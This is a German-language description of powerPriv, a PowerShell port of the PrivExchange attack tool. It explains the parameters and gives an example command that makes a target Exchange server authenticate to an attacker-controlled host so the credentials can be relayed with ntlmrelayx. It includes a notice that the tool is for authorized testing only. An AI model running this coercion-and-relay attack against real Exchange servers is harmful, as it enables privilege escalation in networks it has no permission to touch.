
Eine Powershell-Implementierung von PrivExchange, die dafür ausgelegt ist, im Kontext des aktuellen Benutzers ausgeführt zu werden.
Eine PowerShell-Implementierung von PrivExchange von @_dirkjan (Originalcode hier: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Nützlich für Umgebungen, in denen Sie keine Python-basierten Anwendungen ausführen können, Benutzeranmeldeinformationen haben oder keine Dateien auf die Festplatte ablegen möchten. Bewirkt, dass das Systemkonto des Ziel-Exchange-Servers versucht, sich bei einem System Ihrer Wahl zu authentifizieren.
-targetHostHostname oder IP der Ziel-Exchange-Box. Abhängig von der DNS-Konfiguration kann bei Verwendung des Hostnamens ein FQDN erforderlich sein. (Erforderlich)
-attackerHostHostname oder IP eines von Ihnen kontrollierten Systems, auf dem Sie idealerweise ntlmrelayx ausführen. Wir teilen dem Exchange-Server mit, dass er versuchen soll, sich bei diesem System zu authentifizieren. Abhängig von der DNS-Konfiguration kann bei Verwendung des Hostnamens ein FQDN erforderlich sein. (Erforderlich)
-exchangePortPort, über den versucht wird, eine Verbindung zum Exchange-Server herzustellen. Standard ist 443.
-attackerPortPort, über den der Exchange-Server versuchen soll, sich mit dem Angreifer zu verbinden. Standard ist 80
-attackerPageSeite, zu der wir dem Exchange-Server mitteilen, dass er sich auf unserem Angriffssystem verbinden soll. Schrägstriche sind nicht erforderlich. Standard ist powerPriv.
-noSSLAuf true setzen, wenn Sie für die erste Verbindung zum Exchange-Server kein https verwenden möchten. Standard ist false (https verwenden).
-VersionVersion des Exchange-Servers, den wir angreifen. Standard ist 2013.
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
Autor: @g0ldenGunSec - Basierend auf dem Tool, das von @_dirkjan erstellt wurde.
Verwenden Sie dieses Tool nur in Netzwerken, die Ihnen gehören oder für die Sie die Erlaubnis zum Testen haben.